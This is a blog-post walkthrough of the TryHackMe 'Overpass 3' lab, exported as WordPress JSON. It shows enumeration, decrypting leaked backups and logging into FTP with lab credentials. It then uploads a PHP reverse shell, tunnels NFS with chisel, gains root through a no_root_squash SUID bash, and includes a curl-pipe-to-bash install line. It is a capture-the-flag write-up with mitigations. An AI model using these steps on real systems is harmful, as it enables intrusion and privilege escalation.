{"id":131088,"date":"2023-01-09T10:40:58","date_gmt":"2023-01-09T10:40:58","guid":{"rendered":"https:\/\/blog.finxter.com\/?p=1045890"},"modified":"2023-01-09T10:40:58","modified_gmt":"2023-01-09T10:40:58","slug":"how-i-hacked-into-a-hosting-company-and-exposed-a-vulnerability-thm-overpass-3","status":"publish","type":"post","link":"https:\/\/sickgaming.net\/blog\/2023\/01\/09\/how-i-hacked-into-a-hosting-company-and-exposed-a-vulnerability-thm-overpass-3\/","title":{"rendered":"How I Hacked Into a Hosting Company and Exposed a Vulnerability (THM Overpass 3)"},"content":{"rendered":"\n<h2>BOX OVERVIEW<\/h2>\n<ul>\n<li><strong>Link<\/strong>: <a href=\"https:\/\/tryhackme.com\/room\/overpass3hosting\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/tryhackme.com\/room\/overpass3hosting<\/a><\/li>\n<li><strong>Difficulty<\/strong>: Medium<\/li>\n<li><strong>Target<\/strong>: web, user, root flags<\/li>\n<li><strong>Highlight<\/strong>: port forwarding with <code>chisel<\/code><\/li>\n<li><strong>Tools<\/strong>: <code>nmap<\/code>, <code>dirb<\/code>, <code>linpeas<\/code><\/li>\n<li><strong>Technology<\/strong>: <code>ftp<\/code>, <code>ssh<\/code>, <code>nfs<\/code><\/li>\n<\/ul>\n
<h2>PREMISE<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-87-1024x683.png\" alt=\"\" class=\"wp-image-1045929\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-87-1024x683.png 1024w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-87-300x200.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-87-768x512.png 768w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-87.png 1317w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/div>\n<p>This is the third and final installment of the Overpass challenges on TryHackMe. Here are the other two Overpass walkthroughs, in case you missed them:<\/p>\n<ul>\n<li><a rel=\"noreferrer noopener\" href=\"https:\/\/blog.finxter.com\/tryhackme-overpass-1-compsci-students-creating-a-pw-manager-gone-bad\/\" target=\"_blank\">Overpass 1<\/a><\/li>\n<li><a href=\"https:\/\/blog.finxter.com\/thm-overpass-2-how-i-found-a-server-backdoor-with-wireshark\/\" target=\"_blank\" rel=\"noreferrer noopener\">Overpass 2<\/a><\/li>\n<\/ul>\n<p>In today\u2019s challenge, the team of comp-sci students is at it again with a new website hosting company. However, they haven\u2019t learned much about security yet.
<\/p>\n<p>We\u2019ll hack into their new site, escalate our privileges to the root user, and show them that they need to make some security upgrades.<\/p>\n<h2>ENUMERATION<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"683\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-88-1024x683.png\" alt=\"\" class=\"wp-image-1045930\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-88-1024x683.png 1024w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-88-300x200.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-88-768x512.png 768w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-88.png 1317w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/div>\n<p>First, we\u2019ll note down the target IP and our own IP as bash variables with <code>export<\/code>.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">export targetIP=10.10.232.238\nexport myIP=10.6.2.23<\/pre>\n<p>Let\u2019s also start a regular <code>nmap<\/code> scan of all <a href=\"https:\/\/blog.finxter.com\/bash-port-scanning-ssh-as-a-python-script-tryhackme\/\" data-type=\"post\" data-id=\"914974\" target=\"_blank\" rel=\"noreferrer noopener\">ports<\/a>, and a <code>dirb<\/code> scan to sniff out web app directories.<\/p>\n<p>The <code>dirb<\/code> scan found a listable <code>\/backups<\/code> directory that reveals a <code>backups.zip<\/code> file.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">\u2500[kalisurfer@parrot]\u2500[~]\n\u2514\u2500\u2500\u257c $dirb http:\/\/10.10.232.238\n\n-----------------\nDIRB v2.22\nBy The Dark Raver\n-----------------\n\nSTART_TIME: Thu Jan 5 11:16:14 2023\nURL_BASE: http:\/\/10.10.232.238\/\nWORDLIST_FILES: \/usr\/share\/dirb\/wordlists\/common.txt\n\n-----------------\n\nGENERATED WORDS: 4612\n\n---- Scanning URL: http:\/\/10.10.232.238\/ ----\n==> DIRECTORY: http:\/\/10.10.232.238\/backups\/\n+ http:\/\/10.10.232.238\/cgi-bin\/ (CODE:403|SIZE:217)\n+ http:\/\/10.10.232.238\/index.html (CODE:200|SIZE:1770)\n\n---- Entering directory: http:\/\/10.10.232.238\/backups\/ ----\n(!) WARNING: Directory IS LISTABLE. No need to scan it.\n    (Use mode '-w' if you want to scan it anyway)\n\n-----------------\nEND_TIME: Thu Jan 5 11:23:15 2023\nDOWNLOADED: 4612 - FOUND: 2\n<\/pre>\n<p>After unzipping the <code>backups.zip<\/code> file, we have two files:<\/p>\n<pre class=\"wp-block-preformatted\"><code>priv.key\nCustomerDetails.xlsx.pgp<\/code><\/pre>\n<p>The private key needed to decrypt the spreadsheet was shipped in the very same backup. Let\u2019s move ahead and import the <code>priv.key<\/code> file with <code>gpg<\/code> (GnuPG), then use it to decrypt the spreadsheet:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">gpg --import priv.key\ngpg --output CustomerDetails.xlsx --decrypt CustomerDetails.xlsx.pgp\n<\/pre>\n<p>And now there is a third file: <code>CustomerDetails.xlsx<\/code><\/p>\n<p>This file is a spreadsheet of customer data including usernames, passwords and <em>credit card numbers<\/em>, all of it sitting in a backup exposed under the public web root. Let\u2019s record the passwords in our <code>notes.txt<\/code> file for later reference.<\/p>\n<pre class=\"wp-block-preformatted\"><code>username:password\nparadox ShibesAreGreat123\n0day OllieIsTheBestDog\nmuirlandoracle A11D0gsAreAw3s0me<\/code>\n<\/pre>\n<p>The <code>nmap<\/code> scan shows a few open ports: FTP on 21, SSH on 22 and HTTP on 80.
<\/p>\n<p>The FTP server may allow anonymous login. We\u2019ll test that out soon. First, we\u2019ll drill in a bit more on the open ports with a second <code>nmap<\/code> scan:<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"397\" height=\"133\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-81.png\" alt=\"\" class=\"wp-image-1045897\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-81.png 397w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-81-300x101.png 300w\" sizes=\"auto, (max-width: 397px) 100vw, 397px\" \/><\/figure>\n<\/div>\n<h2>WALKING THE WEBSITE<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"683\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-89-1024x683.png\" alt=\"\" class=\"wp-image-1045933\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-89-1024x683.png 1024w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-89-300x200.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-89-768x512.png 768w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-89.png 1317w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/div>\n<p>There\u2019s not much of use on the website running on port 80. Nothing stands out in the text on the site except the potential usernames and hobbies:<\/p>\n<pre class=\"wp-block-preformatted\"><code>Paradox - Our lead web designer, Paradox can help you create your dream website from the ground up\nElf - Overpass' newest intern, Elf. Elf helps maintain the webservers day to day to keep your site running smoothly and quickly.\nMuirlandOracle - HTTPS and networking specialist. 
Muir's many years of experience and enthusiasm for networking keeps Overpass running, and your sites, online all of the time.\nNinjaJc01 - James started Overpass, and keeps the business side running. If you have pricing questions or want to discuss how Overpass can help your business, reach out to him!<\/code><\/pre>\n<p>A quick look through the source code and the developer mode doesn\u2019t reveal anything more here.&nbsp;<\/p>\n<h2>CONNECTING WITH FTP<\/h2>\n<p>We test out connecting to the FTP service as user paradox with the command:<\/p>\n<pre class=\"wp-block-preformatted\"><code>lftp -u paradox $targetIP\npassword=ShibesAreGreat123 (from the xlsx spreadsheet)<\/code><\/pre>\n<p>We are connected and can see a bunch of files and a directory for backups.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"394\" height=\"403\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-82.png\" alt=\"\" class=\"wp-image-1045899\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-82.png 394w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-82-293x300.png 293w\" sizes=\"auto, (max-width: 394px) 100vw, 394px\" \/><\/figure>\n<\/div>\n<p>Now that we are connected to the web hosting service, we can upload a payload to <a href=\"https:\/\/blog.finxter.com\/python-one-line-reverse-shell\/\" data-type=\"post\" data-id=\"11536\" target=\"_blank\" rel=\"noreferrer noopener\">spawn a reverse shell<\/a> to give us an initial foothold into the box.\u00a0<\/p>\n<h2>CRAFTING A REVERSE SHELL PAYLOAD<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"591\" height=\"887\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-90.png\" alt=\"\" class=\"wp-image-1045934\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-90.png 591w, 
https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-90-200x300.png 200w\" sizes=\"auto, (max-width: 591px) 100vw, 591px\" \/><\/figure>\n<\/div>\n<p>We\u2019ll use the <a rel=\"noreferrer noopener\" href=\"https:\/\/github.com\/pentestmonkey\/php-reverse-shell\" target=\"_blank\">pentestmonkey PHP reverse shell<\/a> as offered by revshells.com. This is a good choice because the web server executes a PHP file server-side as soon as it is requested, so simply browsing to the uploaded file runs the payload. I\u2019ve also used this payload successfully before on another box.<\/p>\n<p>Let\u2019s go ahead and copy the PHP reverse shell, set our <code>lhost<\/code> (the attack box IP) and <code>lport<\/code> in the file, and save the revshell as <code>rev.php<\/code>. I\u2019ll use port 8888.<\/p>\n<h2>UPLOADING THE PAYLOAD WITH FTP<\/h2>\n<p>Let\u2019s use the terminal window still connected to the FTP service to upload the <code>rev.php<\/code> file with the command:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">put rev.php<\/pre>\n<p>The file is now in the web root and ready to use: the FTP account for paradox writes straight into the directory the web server serves, which is what turns a leaked FTP password into code execution.<\/p>\n<h2>SPINNING UP A NETCAT LISTENER TO CATCH A REVSHELL<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"591\" height=\"887\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-91.png\" alt=\"\" class=\"wp-image-1045937\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-91.png 591w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-91-200x300.png 200w\" sizes=\"auto, (max-width: 591px) 100vw, 591px\" \/><\/figure>\n<\/div>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">nc -lvnp 8888<\/pre>\n<p>Next we\u2019ll navigate in our browser to <code>$targetIP\/rev.php<\/code>.<\/p>\n<p>At this point, our netcat listener catches the revshell and we have an initial foothold as the <code>apache<\/code> user!<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"484\" height=\"245\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-83.png\" alt=\"\" class=\"wp-image-1045903\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-83.png 484w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-83-300x152.png 300w\" sizes=\"auto, (max-width: 484px) 100vw, 484px\" \/><\/figure>\n<\/div>\n<p>Let\u2019s search for the <code>web.flag<\/code> file with the following command:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">find \/ -type f -name web.flag 2>\/dev\/null<\/pre>\n<p>The last part of this command (<code>2>\/dev\/null<\/code>) redirects standard error (file descriptor 2) to <code>\/dev\/null<\/code>, so the permission-denied messages from directories the <code>apache<\/code> user cannot read are discarded and only matches are printed.<\/p>\n<p>And we\u2019ve found it!<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">\/usr\/share\/httpd\/web.flag<\/pre>\n<h2>STABILIZE A REVSHELL<\/h2>\n<p>We can use a <a href=\"https:\/\/blog.finxter.com\/python-one-line-x\/\" data-type=\"post\" data-id=\"10612\" target=\"_blank\" rel=\"noreferrer noopener\">Python one-liner<\/a> to upgrade the raw shell to a proper TTY, which <code>su<\/code> needs in order to prompt for a password.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">python3 -c 'import pty;pty.spawn(\"\/bin\/bash\")'<\/pre>\n<p>Now we can do a lateral move over to paradox\u2019s account with the password from the spreadsheet.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">su paradox<\/pre>\n<h2>RUNNING LINPEAS ON THE TARGET MACHINE<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"592\" height=\"887\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-92.png\" alt=\"\" class=\"wp-image-1045940\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-92.png 592w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-92-200x300.png 200w\" sizes=\"auto, (max-width: 592px) 100vw, 592px\" \/><\/figure>\n<\/div>\n<p>The most interesting finding of <code>linpeas<\/code> is:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 Analyzing NFS Exports Files (limit 70)\n-rw-r--r--. 1 root root 54 Nov 18 2020 \/etc\/exports\n\/home\/james *(rw,fsid=0,sync,no_root_squash,insecure)\n<\/pre>\n<p>The <code>no_root_squash<\/code> option is the misconfiguration here. By default an NFS server maps a client\u2019s root user to an unprivileged account (root squashing); with <code>no_root_squash<\/code>, anyone who mounts the export as root on their own machine keeps root\u2019s authority over the exported files, which is a path to root on the server. The export is also open to any client (<code>*<\/code>) and marked <code>insecure<\/code>, which accepts requests from unprivileged source ports.
<\/p>\n<p class=\"has-base-background-color has-background\"><img decoding=\"async\" src=\"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/1f449.png\" alt=\"\ud83d\udc49\" class=\"wp-smiley\" style=\"height: 1em; max-height: 1em;\" \/> <strong>Recommended<\/strong>: <a href=\"https:\/\/blog.finxter.com\/hacking-network-file-system-nfs-a-tryhackme-walkthrough\/\" data-type=\"post\" data-id=\"1041581\" target=\"_blank\" rel=\"noreferrer noopener\">No Root Squash<\/a><\/p>\n<p>The export is user James\u2019 home folder, so our attack vector is becoming clearer: we will look for a way to escalate privileges through James\u2019 account.<\/p>\n<h2>BECOMING PARADOX<\/h2>\n<p>After stabilizing the revshell we can make the lateral move and switch users to <code>paradox<\/code> with the password from the spreadsheet:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">su paradox\nPassword: ShibesAreGreat123\n<\/pre>\n<h2>EXPLOITING NFS WITH NO_ROOT_SQUASH<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"683\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-93-1024x683.png\" alt=\"\" class=\"wp-image-1045941\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-93-1024x683.png 1024w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-93-300x200.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-93-768x512.png 768w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-93.png 1317w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/div>\n<p>Following up now on the <code>linpeas<\/code> results, let\u2019s investigate this NFS service a bit more.<\/p>\n<p>
NFS did not show up in the <code>nmap<\/code> scan, but it did in the <code>linpeas<\/code> results, so my hunch is that the service is firewalled from the outside.<\/p>\n<p>This is easy enough to work around, but first we need to determine the port the service is listening on. With the following command on the target machine we can find it:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">rpcinfo -p | grep nfs<\/pre>\n<p>The output shows NFS listening on port 2049. We\u2019ll use <code>chisel<\/code>, a TCP tunnelling tool that is transported over HTTP and secured via SSH, to forward the firewalled port back to our attack machine.<\/p>\n<h2>USING CHISEL TO PORT FORWARD<\/h2>\n<p>We\u2019ll need to grab <code>chisel<\/code> from its GitHub page. There are a few ways to install it from the repo. I chose to use the <a href=\"https:\/\/blog.finxter.com\/level-up-your-python-with-these-38-clever-one-liners\/\" data-type=\"post\" data-id=\"972745\" target=\"_blank\" rel=\"noreferrer noopener\">one-liner<\/a>:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">curl https:\/\/i.jpillora.com\/chisel! | bash<\/pre>\n<p>Once installed, I copied the <code>chisel<\/code> binary over to the target machine.<\/p>\n<p>
To get this done, we\u2019ll spin up a simple <a href=\"https:\/\/blog.finxter.com\/python-one-liner-webserver\/\" data-type=\"URL\" data-id=\"https:\/\/blog.finxter.com\/python-one-liner-webserver\/\" target=\"_blank\" rel=\"noreferrer noopener\">HTTP server using Python<\/a> on the attack box, and then <code>curl<\/code> the file from the target machine.<\/p>\n<p>Now that <code>chisel<\/code> is on both machines, let\u2019s create the tunnel. The following commands forward the NFS service, which listens on port 2049 on the target but is firewalled from the outside, back to port 2049 on our attack box.<\/p>\n<p>From the attack box (the server listens on port 7777, and <code>--reverse<\/code> allows clients to request reverse port forwards):<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">chisel server -p 7777 --reverse -v<\/pre>\n<p>From the victim box (<code>R:2049:127.0.0.1:2049<\/code> asks the server to listen on its own port 2049 and relay each connection to <code>127.0.0.1:2049<\/code> on the target):<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">.\/chisel client 10.6.2.23:7777 R:2049:127.0.0.1:2049 &amp;<\/pre>\n<p>The <code>&amp;<\/code> at the end of the command instructs bash to run it as a background job, so we keep the use of our shell.<\/p>\n<h2>BECOMING JAMES<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"683\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-94-1024x683.png\" alt=\"\" class=\"wp-image-1045942\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-94-1024x683.png 1024w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-94-300x200.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-94-768x513.png 768w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-94.png 1317w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/div>\n<p>Normally we would check whether the NFS server has any mountable directories with <code>showmount<\/code>:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">showmount -e $targetIP<\/pre>\n<p>Here, though, <code>showmount<\/code> talks to <code>rpcbind<\/code> and <code>mountd<\/code> rather than to port 2049, and our tunnel only forwards 2049, so the reliable check is to read the exports file on the target:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">cat \/etc\/exports<\/pre>\n<p>Now let\u2019s mount the export through the tunnel onto the folder <code>\/mount<\/code> (which already exists on my machine). NFSv4 needs only port 2049, which is why forwarding that single port is enough, and the export\u2019s <code>fsid=0<\/code> makes James\u2019 home the root of the NFSv4 tree, so we mount <code>\/<\/code>:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo mount -t nfs 127.0.0.1:\/ \/mount<\/pre>\n<p>The <code>user.flag<\/code> is right there in James\u2019 home directory! Checking for hidden files and directories with \u201c<code>ls -la<\/code>\u201d reveals a hidden <code>.ssh<\/code> directory, and inside it an SSH private key.
<\/p>\n<p>Let\u2019s copy this key over to our machine so that we can <code>ssh<\/code> directly into James\u2019 account without needing the password.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"538\" height=\"342\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-84.png\" alt=\"\" class=\"wp-image-1045923\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-84.png 538w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-84-300x191.png 300w\" sizes=\"auto, (max-width: 538px) 100vw, 538px\" \/><\/figure>\n<\/div>\n<h2>GAINING ROOT PRIVILEGES WITH PERSISTENCE<\/h2>\n<p>With James\u2019 account on the target and root on the attack box writing through the <code>no_root_squash<\/code> export, we can place a SUID copy of bash in James\u2019 home directory and run it to get a root shell. Let\u2019s first copy <code>\/bin\/bash<\/code> into the home directory.<\/p>\n<p>On the target box:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">cp \/bin\/bash .<\/pre>\n<p>Then, as root on the attack box, make the copy executable and set the SUID bit through the mounted NFS folder. A SUID binary runs with the privileges of its owner, so the copy has to end up owned by root for this to give us root; <code>no_root_squash<\/code> is exactly what lets our local root arrange that on the server\u2019s files:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">chmod +xs bash<\/pre>\n<p>Last, but not least, let\u2019s run it from the target box in privileged mode (<code>-p<\/code> tells bash to keep the effective UID it was started with instead of dropping it):<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">.\/bash -p<\/pre>\n<p>And we are now root!<\/p>\n<p>
Let\u2019s grab the <code>root.txt<\/code> in <code>\/root\/root.txt<\/code>.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"757\" height=\"208\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-85.png\" alt=\"\" class=\"wp-image-1045924\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-85.png 757w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-85-300x82.png 300w\" sizes=\"auto, (max-width: 757px) 100vw, 757px\" \/><\/figure>\n<\/div>\n<h2>RECOMMENDED MITIGATION STEPS<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"683\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-95-1024x683.png\" alt=\"\" class=\"wp-image-1045944\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-95-1024x683.png 1024w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-95-300x200.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-95-768x512.png 768w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-95.png 1317w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/div>\n<ol>\n<li>Disable <code>no_root_squash<\/code> on NFS<\/li>\n<li>Change permissions on all parts of the website that are not intended to be seen by the public. 
This includes the <code>\/backups<\/code> folder<\/li>\n<\/ol>\n<p class=\"has-base-background-color has-background\"><img decoding=\"async\" src=\"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/1f449.png\" alt=\"\ud83d\udc49\" class=\"wp-smiley\" style=\"height: 1em; max-height: 1em;\" \/> <strong>Recommended Tutorial<\/strong>: <a href=\"https:\/\/blog.finxter.com\/tryhackme-walkthrough-wonderland\/\" data-type=\"post\" data-id=\"892288\" target=\"_blank\" rel=\"noreferrer noopener\">TryHackMe Challenge &#8211; Wonderland<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>5\/5 &#8211; (1 vote) BOX OVERVIEW Link: https:\/\/tryhackme.com\/room\/overpass3hosting Difficulty: Medium Target: web, user, root flags Highlight: port forwarding with chisel Tools: nmap, dirb, linpeas Technology: ftp, ssh, nfs PREMISE This is the third and final installment of the Overpass challenges on TryHackMe. Here are the other two overpass walkthroughs, just in case you missed them: 